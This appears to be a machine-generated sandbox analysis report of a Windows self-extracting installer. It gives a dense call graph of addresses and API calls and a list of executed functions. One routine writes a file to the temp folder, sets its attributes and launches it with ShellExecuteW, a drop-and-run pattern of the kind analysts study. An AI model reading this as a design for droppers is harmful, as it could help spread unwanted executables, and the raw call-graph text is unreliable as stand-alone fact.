??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 401411 2 API calls 9533->9534 9541 4048bc 9534->9541 9535 401329 2 API calls 9535->9541 9536 40494e 9537 404988 ??3@YAXPAX 9536->9537 9539 4048ab 3 API calls 9536->9539 9537->9276 9538 401429 2 API calls 9538->9541 9540 404985 9539->9540 9540->9537 9541->9535 9541->9536 9541->9538 9542 40243b lstrcmpW 9541->9542 9542->9541 9544 40661a 2 API calls 9543->9544 9545 4049af 9544->9545 9546 401f9d 19 API calls 9545->9546 9547 4049bd 9546->9547 9548 4024fc 2 API calls 9547->9548 9549 4049c7 9548->9549 9550 4049fd 9549->9550 9552 40254d ??2@YAPAXI ??3@YAXPAX 9549->9552 9551 40254d 2 API calls 9550->9551 9553 404a0a 9551->9553 9552->9549 9554 401f9d 19 API calls 9553->9554 9555 404a11 9554->9555 9556 40254d 2 API calls 9555->9556 9557 404a1b 9556->9557 9558 4073d1 21 API calls 9557->9558 9559 404a30 ??3@YAXPAX 9558->9559 9560 404a41 ctype 9559->9560 9560->9083 9562 40e8da ctype 3 API calls 9561->9562 9563 403e7e 9562->9563 9564 40e8da ctype 3 API calls 9563->9564 9565 40e943 ??3@YAXPAX 9564->9565 9565->9077 9567 40db53 2 API calls 9566->9567 9568 404ce8 9567->9568 9569 404d44 9568->9569 9571 4024fc 2 API calls 9568->9571 9570 4025ae 2 API calls 9569->9570 9572 404d4c 9570->9572 9573 404cf7 9571->9573 9574 403e86 2 API calls 9572->9574 9577 404db5 ??3@YAXPAX 9573->9577 9579 403354 86 API calls 9573->9579 9575 404d59 9574->9575 9576 403ef6 2 API calls 9575->9576 9578 404d66 9576->9578 9591 404db1 9577->9591 9580 403ef6 2 API calls 9578->9580 9581 404d1b 9579->9581 9582 404d73 9580->9582 9581->9577 9584 40db53 2 API calls 9581->9584 9583 403ef6 2 API calls 9582->9583 9585 404d80 9583->9585 9586 404d37 9584->9586 9587 40dd5f 2 API calls 9585->9587 9586->9577 9588 404d3b ??3@YAXPAX 9586->9588 9589 404d94 9587->9589 9588->9569 9589->9577 9590 404d9d ??3@YAXPAX 9589->9590 9590->9591 9591->9142 9593 4025ae 2 API calls 9592->9593 9609 4030a8 9593->9609 9594 403301 9595 403344 ??3@YAXPAX 9594->9595 9596 40334e 9595->9596 9596->9128 9596->9135 9597 401411 ??2@YAPAXI ??3@YAXPAX 9597->9609 9599 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9599->9609 9600 401362 2 API calls 9601 4030f3 ??3@YAXPAX ??3@YAXPAX 9600->9601 9602 403303 9601->9602 9601->9609 10393 4029c3 9602->10393 9606 40331c ??3@YAXPAX 9606->9596 9607 4031e5 strncmp 9608 4031d0 strncmp 9607->9608 9607->9609 9608->9607 9608->9609 9609->9594 9609->9597 9609->9599 9609->9600 9609->9602 9609->9607 9610 401362 2 API calls 9609->9610 9611 402640 2 API calls 9609->9611 9614 402640 ??2@YAPAXI ??3@YAXPAX 9609->9614 9616 4023dd lstrcmpW 9609->9616 9617 402f6c 7 API calls 9609->9617 9619 403330 9609->9619 9620 4032b2 lstrcmpW 9609->9620 9624 401329 2 API calls 9609->9624 10387 402986 9609->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9609->10392 9612 403252 ??3@YAXPAX 9610->9612 9611->9608 9613 402a69 9 API calls 9612->9613 9615 403263 lstrcmpW 9613->9615 9614->9609 9615->9609 9616->9609 9617->9609 9622 402f6c 7 API calls 9619->9622 9620->9609 9621 4032c0 lstrcmpW 9620->9621 9621->9609 9623 40333c 9622->9623 10411 402425 ??3@YAXPAX ??3@YAXPAX 9623->10411 9624->9609 9627 402f86 9626->9627 9628 402f7b 9626->9628 9630 408761 4 API calls 9627->9630 10413 402668 9628->10413 9631 402f92 9630->9631 9631->9132 9632->9132 9634 4024fc 2 API calls 9633->9634 9635 40485f 9634->9635 9636 40254d 2 API calls 9635->9636 9637 40486c 9636->9637 9638 404888 9637->9638 9639 401429 2 API calls 9637->9639 9640 40254d 2 API calls 9638->9640 9639->9637 9641 404892 9640->9641 9642 40408b 94 API calls 9641->9642 9643 40489d ??3@YAXPAX 9642->9643 9643->9176 9645 4040a2 lstrlenW 9644->9645 9646 4040ce 9644->9646 9647 401a85 4 API calls 9645->9647 9646->9176 9648 4040b8 9647->9648 9648->9645 9648->9646 9649 4040d5 9648->9649 9650 4024fc 2 API calls 9649->9650 9653 4040de 9650->9653 10418 402776 9653->10418 9654 403093 84 API calls 9655 40414c 9654->9655 9656 404156 ??3@YAXPAX ??3@YAXPAX 9655->9656 9657 40416d ??3@YAXPAX ??3@YAXPAX 9655->9657 9656->9646 9657->9646 9658->9189 9660 40661a 2 API calls 9659->9660 9661 403b48 9660->9661 9661->9178 9663 408646 9662->9663 9675 4083d5 ctype 9662->9675 9663->9184 9664 40661a 2 API calls 9664->9675 9665 40786b 23 API calls 9665->9675 9666 40243b lstrcmpW 9666->9675 9668 407674 23 API calls 9668->9675 9669 407613 23 API calls 9669->9675 9670 403b40 2 API calls 9670->9675 9671 401f9d 19 API calls 9671->9675 9672 407776 55 API calls 9672->9675 9673 403f48 4 API calls 9673->9675 9674 4073d1 21 API calls 9674->9675 9675->9663 9675->9664 9675->9665 9675->9666 9675->9668 9675->9669 9675->9670 9675->9671 9675->9672 9675->9673 9675->9674 9676 407717 25 API calls 9675->9676 9677 4073d1 21 API calls 9675->9677 10428 40744b 9675->10428 9676->9675 9678 408476 ??3@YAXPAX 9677->9678 9678->9675 9680 40243b lstrcmpW 9679->9680 9681 4082fd 9680->9681 9682 40830b 9681->9682 10432 4019f0 GetStdHandle WriteFile 9681->10432 9684 40831e 9682->9684 10433 4019f0 GetStdHandle WriteFile 9682->10433 9686 408333 9684->9686 10434 4019f0 GetStdHandle WriteFile 9684->10434 9688 408344 9686->9688 10435 4019f0 GetStdHandle WriteFile 9686->10435 9690 40243b lstrcmpW 9688->9690 9691 408351 9690->9691 9694 40835f 9691->9694 10436 4019f0 GetStdHandle WriteFile 9691->10436 9693 40243b lstrcmpW 9695 40836c 9693->9695 9694->9693 9696 40837a 9695->9696 10437 4019f0 GetStdHandle WriteFile 9695->10437 9698 40243b lstrcmpW 9696->9698 9699 408387 9698->9699 9700 408395 9699->9700 10438 4019f0 GetStdHandle WriteFile 9699->10438 9702 40243b lstrcmpW 9700->9702 9703 4083a2 9702->9703 9704 4083b2 9703->9704 10439 4019f0 GetStdHandle WriteFile 9703->10439 9704->9180 9707 407636 9706->9707 9708 407658 9707->9708 9709 40764b 9707->9709 10443 407186 9708->10443 10440 407154 9709->10440 9712 407653 9713 4073d1 21 API calls 9712->9713 9714 407671 9713->9714 9714->9222 9716 407689 9715->9716 9717 40716d 2 API calls 9716->9717 9718 407694 9717->9718 9719 4073d1 21 API calls 9718->9719 9720 4076a5 9719->9720 9720->9222 9722 401411 2 API calls 9721->9722 9723 403f96 9722->9723 9724 402535 2 API calls 9723->9724 9725 403f9f GetTempPathW 9724->9725 9726 403fb8 9725->9726 9731 403fcf 9725->9731 9727 402535 2 API calls 9726->9727 9728 403fc3 GetTempPathW 9727->9728 9728->9731 9729 402535 2 API calls 9730 403ff2 wsprintfW 9729->9730 9730->9731 9731->9729 9732 404009 GetFileAttributesW 9731->9732 9733 40402d 9731->9733 9732->9731 9732->9733 9733->9207 9735 40787e 9734->9735 10449 40719f 9735->10449 9738 4073d1 21 API calls 9739 4078b3 9738->9739 9739->9225 9741 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9740->9741 9742 403e16 9740->9742 9741->9226 9743 402c86 16 API calls 9742->9743 9743->9741 9745 40243b lstrcmpW 9744->9745 9746 40455d 9745->9746 9747 404592 9746->9747 9748 401329 2 API calls 9746->9748 9747->9277 9749 40456c 9748->9749 9750 403b7f 19 API calls 9749->9750 9751 404572 9750->9751 9751->9747 9752 401429 2 API calls 9751->9752 9752->9747 9754 4012f7 2 API calls 9753->9754 9755 4043d4 9754->9755 9756 40254d 2 API calls 9755->9756 9757 4043df 9756->9757 9757->9266 9759 4021a9 9758->9759 9760 40218e LoadLibraryA GetProcAddress 9758->9760 9759->9323 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9609 10391->10389 10392->9609 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9606 10411->9595 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9627 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9654 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9675 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9682 10433->9684 10434->9686 10435->9688 10436->9694 10437->9696 10438->9700 10439->9704 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9712 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9712 10450 40661a 2 API calls 10449->10450 10451 4071a7 10450->10451 10451->9738 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 8043->8048 8047->8038 8047->8039 8049 401fb4 8048->8049 8050 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8049->8050 8051 401fdb 8049->8051 8052 402095 SetLastError 8050->8052 8053 40201d ??2@YAPAXI GetEnvironmentVariableW 8050->8053 8068 407717 8051->8068 8052->8051 8058 4020ac 8052->8058 8054 40204c GetLastError 8053->8054 8067 40207e ??3@YAXPAX 8053->8067 8055 402052 8054->8055 8054->8067 8061 402081 8055->8061 8062 40205c lstrcmpiW 8055->8062 8057 4020cb lstrlenA ??2@YAPAXI 8059 402136 MultiByteToWideChar 8057->8059 8060 4020fc GetLocaleInfoW 8057->8060 8058->8057 8075 401f47 8058->8075 8059->8051 8060->8059 8065 402123 _wtol 8060->8065 8061->8052 8066 40206b ??3@YAXPAX 8062->8066 8062->8067 8064 4020c1 8064->8057 8065->8059 8066->8061 8067->8061 8082 40661a 8068->8082 8071 40773c IsBadReadPtr 8073 40774e 8071->8073 8086 4073d1 8073->8086 8076 401f51 GetUserDefaultUILanguage 8075->8076 8077 401f95 8075->8077 8078 401f72 GetSystemDefaultUILanguage 8076->8078 8079 401f6e 8076->8079 8077->8064 8078->8077 8080 401f7e GetSystemDefaultLCID 8078->8080 8079->8064 8080->8077 8081 401f8e 8080->8081 8081->8077 8083 406643 8082->8083 8084 40666f IsWindow 8082->8084 8083->8084 8085 40664b GetSystemMetrics GetSystemMetrics 8083->8085 8084->8071 8084->8073 8085->8084 8087 4073e0 8086->8087 8088 407444 8086->8088 8087->8088 8098 4024fc 8087->8098 8088->8047 8090 4073f1 8091 4024fc 2 API calls 8090->8091 8092 4073fc 8091->8092 8102 403b7f 8092->8102 8095 403b7f 19 API calls 8096 40740e ??3@YAXPAX ??3@YAXPAX 8095->8096 8096->8088 8099 402513 8098->8099 8111 40112b 8099->8111 8101 40251e 8101->8090 8175 403880 8102->8175 8104 403b59 8116 40393b 8104->8116 8106 403b69 8139 4039f6 8106->8139 8108 403b74 8162 4027c7 8108->8162 8112 401177 8111->8112 8113 401139 ??2@YAPAXI 8111->8113 8112->8101 8113->8112 8115 40115a 8113->8115 8114 40116f ??3@YAXPAX 8114->8112 8115->8114 8115->8115 8198 401411 8116->8198 8120 403954 8205 40254d 8120->8205 8122 403961 8123 4024fc 2 API calls 8122->8123 8124 40396e 8123->8124 8209 403805 8124->8209 8127 401362 2 API calls 8128 403992 8127->8128 8129 40254d 2 API calls 8128->8129 8130 40399f 8129->8130 8131 4024fc 2 API calls 8130->8131 8132 4039ac 8131->8132 8133 403805 3 API calls 8132->8133 8134 4039bc ??3@YAXPAX 8133->8134 8135 4024fc 2 API calls 8134->8135 8136 4039d3 8135->8136 8137 403805 3 API calls 8136->8137 8138 4039e2 ??3@YAXPAX ??3@YAXPAX 8137->8138 8138->8106 8140 401411 2 API calls 8139->8140 8141 403a04 8140->8141 8142 401362 2 API calls 8141->8142 8143 403a0f 8142->8143 8144 40254d 2 API calls 8143->8144 8145 403a1c 8144->8145 8146 4024fc 2 API calls 8145->8146 8147 403a29 8146->8147 8148 403805 3 API calls 8147->8148 8149 403a39 ??3@YAXPAX 8148->8149 8150 401362 2 API calls 8149->8150 8151 403a4d 8150->8151 8152 40254d 2 API calls 8151->8152 8153 403a5a 8152->8153 8154 4024fc 2 API calls 8153->8154 8155 403a67 8154->8155 8156 403805 3 API calls 8155->8156 8157 403a77 ??3@YAXPAX 8156->8157 8158 4024fc 2 API calls 8157->8158 8159 403a8e 8158->8159 8160 403805 3 API calls 8159->8160 8161 403a9d ??3@YAXPAX ??3@YAXPAX 8160->8161 8161->8108 8163 401411 2 API calls 8162->8163 8164 4027d5 8163->8164 8165 4027e5 ExpandEnvironmentStringsW 8164->8165 8166 40112b 2 API calls 8164->8166 8167 402809 8165->8167 8168 4027fe ??3@YAXPAX 8165->8168 8166->8165 8234 402535 8167->8234 8169 402840 8168->8169 8169->8095 8172 402824 8173 401362 2 API calls 8172->8173 8174 402838 ??3@YAXPAX 8173->8174 8174->8169 8176 401411 2 API calls 8175->8176 8177 40388e 8176->8177 8178 401362 2 API calls 8177->8178 8179 403899 8178->8179 8180 40254d 2 API calls 8179->8180 8181 4038a6 8180->8181 8182 4024fc 2 API calls 8181->8182 8183 4038b3 8182->8183 8184 403805 3 API calls 8183->8184 8185 4038c3 ??3@YAXPAX 8184->8185 8186 401362 2 API calls 8185->8186 8187 4038d7 8186->8187 8188 40254d 2 API calls 8187->8188 8189 4038e4 8188->8189 8190 4024fc 2 API calls 8189->8190 8191 4038f1 8190->8191 8192 403805 3 API calls 8191->8192 8193 403901 ??3@YAXPAX 8192->8193 8194 4024fc 2 API calls 8193->8194 8195 403918 8194->8195 8196 403805 3 API calls 8195->8196 8197 403927 ??3@YAXPAX ??3@YAXPAX 8196->8197 8197->8104 8199 40112b 2 API calls 8198->8199 8200 401425 8199->8200 8201 401362 8200->8201 8202 40136e 8201->8202 8204 401380 8201->8204 8203 40112b 2 API calls 8202->8203 8203->8204 8204->8120 8206 40255a 8205->8206 8214 401398 8206->8214 8208 402565 8208->8122 8210 40381b 8209->8210 8211 403817 ??3@YAXPAX 8209->8211 8210->8211 8218 4026b1 8210->8218 8222 402f96 8210->8222 8211->8127 8215 4013dc 8214->8215 8216 4013ac 8214->8216 8215->8208 8217 40112b 2 API calls 8216->8217 8217->8215 8219 4026c7 8218->8219 8220 4026db 8219->8220 8226 402346 memmove 8219->8226 8220->8210 8223 402fa5 8222->8223 8225 402fbe 8223->8225 8227 4026e6 8223->8227 8225->8210 8226->8220 8228 4026f6 8227->8228 8229 401398 2 API calls 8228->8229 8230 402702 8229->8230 8233 402346 memmove 8230->8233 8232 40270f 8232->8225 8233->8232 8235 402541 8234->8235 8236 402547 ExpandEnvironmentStringsW 8234->8236 8237 40112b 2 API calls 8235->8237 8236->8172 8237->8236 11181 40e4f9 11182 40e516 11181->11182 11183 40e506 11181->11183 11186 40de46 11183->11186 11189 401b1f VirtualFree 11186->11189 11188 40de81 ??3@YAXPAX 11188->11182 11189->11188

                                          Executed Functions

                                          Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                            • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                            • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                            • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                            • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                            • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                            • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                          • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                          • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                            • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                            • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                            • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                          • _wtol.MSVCRT ref: 0040509F
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                          • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                          • _wtol.MSVCRT ref: 00405217
                                          • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                            • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                            • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                            • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                            • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                            • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                            • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                            • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                            • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                            • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
